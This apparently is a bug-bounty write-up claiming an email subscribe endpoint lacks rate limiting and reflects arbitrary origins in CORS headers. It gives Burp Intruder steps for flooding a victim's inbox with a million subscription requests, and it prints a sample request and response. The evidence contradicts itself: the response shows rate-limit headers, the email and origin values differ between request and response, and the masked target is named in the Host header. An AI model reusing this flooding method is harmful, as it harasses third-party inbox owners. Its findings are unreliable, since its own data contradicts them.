No rate limiting for subscribe email + lead to Cross origin misconfiguration
Hello, Hunters. I know You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.
Description:
I discovered a way to bypass no rate limiting by using “Access-Control-Allow-Origin:” and viewing the response as “200” vulnerable.
There is no mechanism to protect against the requests you made in a short period of time if there is no rate limit. There will be no rate limit set if the repetition does not produce any errors after 50, 100, or 1000 repetitions.
Affected URL: https://XYZ.email/subscribe/
Step-by-step Instructions for Reproduction:
1.. Go to https://XYZ.email/ and scroll down.
2. search for the subscribe button
3. Add the victim emails and run burp-suite again.
4. Request sent to burp-intruder, and all payloads cleared
5. Set the payloads to null and run intruder.
6.1,000,000 requests were sent to victim-email.
Request:
POST /subscribe/ HTTP/1.1
Host: stripo.email
X-Requested-With: XMLHttpRequest
Content-Length: 126
Origin: https://evil.stripo.email
Connection: close
Referer: https://evil.stripo.email/
_token=§§&source=LANDING&subscribe-email=hostbugbounty%40gmail.com&g-recaptcha-response=
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Nov 2020 04:33:08 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
pragma: no-cache
expires: -1
X-RateLimit-Limit: 20
X-RateLimit-Remaining: 14
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Frame-Options: SAMEORIGIN
Access-Control-Allow-Origin: https://evil.xyz.email
Content-Length: 234
{“success”:{“_token”:”Zc3Jo8QdivuDDsaS8LhimIW8mVo88eRVl9FYrBi8",”source”:”LANDING”,”subscribe-email”:”victimuser@gmail.com”,”g-recaptcha-response”:null},”message”:”Thanks! You’re subscribed, look for a confirmation email shortly.”}
Thank you for reading !! hope you get to learn some tricks.
Subscribe to the Shuttlertech YouTube channel for more of this type of content and to watch live POCs & To advance your career connect with me 1:1 over topmate .
I will ensure you that I will write more interesting and knowledge-sharing writeups, to encourage me to follow me on medium and click the clap icon.
Disclaimer: My write-up comes from my own achievements & Some time from different Learning platforms Do not use this methodology without concern for the company. I am just sharing this for learning purposes.